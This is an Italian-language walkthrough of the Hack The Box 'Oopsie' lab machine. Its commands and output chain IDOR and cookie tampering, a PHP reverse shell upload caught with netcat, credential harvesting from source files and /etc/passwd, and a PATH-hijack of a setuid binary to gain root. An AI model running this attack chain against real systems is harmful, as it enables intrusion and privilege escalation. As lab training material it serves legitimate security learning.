IP: 10.129.164.239
-------
nmap -sC -sV 10.129.164.239
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-05 05:32 EDT
Nmap scan report for 10.129.164.239
Host is up (0.16s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

vedo due porte aperte un webservice e una servizio ssh, navigo sul web service
-------------
vedo sulla hompage una scritta che implica la presenza di una pagina di login, uso burpsiute per avere maggiori informazioni, cambio la proxy per reindirizzare a burp
--------
avvio la scansione della proxy e ricarico il sito
sotto target posso vedere la sitemap e scopro dove è situata la pagina di login, ci navigo
---------
provo combinazioni stupide di login ma nessuna funziona, vedo lopzione login as guest e provo, mi si apre una pagina
----------
navigo nel sito e vedo che la pagina upload richiede super admin privilege, cerco con ispeziona elemento se i cookie danno qualche risultato
---------
vedo una sezione ruolo: guest, in qualche modo dovrei riuscire a passare da guest ad admin
-----------
se vado nella sezione account del sito devo specificato il mio ID (uguale a quello del cookie), controllo l'URL
e noto qualcosa di strano

http://10.129.164.239/cdn-cgi/login/admin.php?content=accounts&id=2

è presente un id presumo per ogni account,provo a moficarlo
----------------------
con id=1 ottengo

http://10.129.164.239/cdn-cgi/login/admin.php?content=accounts&id=1
Access ID	Name	Email
34322	admin	admin@megacorp.com

ora che so queste informazioni provo a modifcare il cookie

role admin
user 34322
----------------
ritorno sulla pagina di upload e vedo che ha funzionato, posso caricare dei file.
in questo caso carico una revers shell in php
alcune web shell sono gia installate in kali sotto /usr/share/webshells/
-------------
nella cartella cerco php_reverse_shell e la carico nel sito
-----------
sfrutto gobuster per cercare la directory in cui vengono caricati i file

gobuster dir --url http://10.129.164.239/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.164.239/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/07/07 03:54:59 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://10.129.164.239/images/]
/index.php            (Status: 200) [Size: 10932]                                  
/themes               (Status: 301) [Size: 317] [--> http://10.129.164.239/themes/]
/uploads              (Status: 301) [Size: 318] [--> http://10.129.164.239/uploads/]
/css                  (Status: 301) [Size: 314] [--> http://10.129.164.239/css/]    
Progress: 1502 / 175330 (0.86%)                                    
                                                                                    
===============================================================
2022/07/07 03:55:08 Finished
===============================================================

/uploads sembra proprio ciò che sto cercando
--------------------
per prima cosa devo creare una connessione netcat con la porta specificata nel file php in modo da poter ricevere la shell.
ora navigo sul sito al mio file e vedo che netcat riceve la shell 

10.129.164.239/uploads/php-reverse-shell.php
--------------
per rendere la shell funzionale devo scrivere il seguente comando

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@oopsie:/$ 
------------
tramite la shell navigo sotto la pagina di login per cercare informazioni di accesso

www-data@oopsie:/var/www/html/cdn-cgi/login$ 
------------------
ora tramite una ricerca attraverso GREP ricerco dei pattern all'interno di tutti i file

www-data@oopsie:/var/www/html/cdn-cgi/login$ cat * | grep -i passw*
cat * | grep -i passw*
if($_POST["username"]==="admin" && $_POST["password"]==="MEGACORP_4dm1n!!")
<input type="password" name="password" placeholder="Password" />

vedo la password in chiaro: MEGACORP_4dm1n!!
-----------
cerco i possibili users nella cartella /etc/passwd

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

prendo come utente robert e provo a loggarmi come lui
-----------
sfortunatamente non è lui

www-data@oopsie:/$ su robert      
su robert
Password: MEGACORP_4dm1n!!
---------------
visualizzo il contenuto del file db.php

cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
--------------
riprovo a loggarmi con questa password

www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
su robert
Password: M3g4C0rpUs3r!
robert@oopsie:/var/www/html/cdn-cgi/login$ 

funziona
------------
navigo nella cartella home e trovo la user flag

cat user.txt
f2c74ee8db7983851ab2a96a44eb7981
------------
per scalare i privilegi visualizzo per prima cosa le info di robert

robert@oopsie:~$ id
id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)

vedo che fa parte del gruppo bugtracker
-----------
cerco delle informazioni su questo gruppo 

robert@oopsie:~$ find / -group bugtracker 2>/dev/null
find / -group bugtracker 2>/dev/null
/usr/bin/bugtracker

vedo che sotto la cartella bin c'è qualcosa
-----------
controllo i permessi del file

robert@oopsie:/usr/bin$ ls -la bugtracker && file bugtracker
ls -la bugtracker && file bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 bugtracker
bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped

vedo un suid che potrebbe esssere exploitabile 'setuid'
---------
eseguo begtracker e vedo che si aspetta un input dall'utente, questo input trappreseenta un file che deve essere letto tramite il comando cat, però non specifica il percorso completo e questo potrebbe essere usato a nostro favore
-------
navigo sotto la cartella /temp e creo un file con all'interno /bin/sh chiamato cat (echo "/bin/sh" > cat
) e gli setto i privilegi di esecuzione chmod +x cat
-------
aggiungo /temp alla PATH directory in modo che venga richiamato il file scritto da me 

export PATH=/tmp:$PATH
---------
ora eseguo bugtraker da tmp con ID: 2

robert@oopsie:/tmp$ bugtracker
bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 2
2
---------------

# whoami
whoami
root

vedo che sono diventato root
-------
elimino il file cat creato da me prima e visualizzo la flag sotto la cartella root

root@oopsie:/root# cat root.txt
cat root.txt
af13b0bee69f8a877c3faf667f7beacf

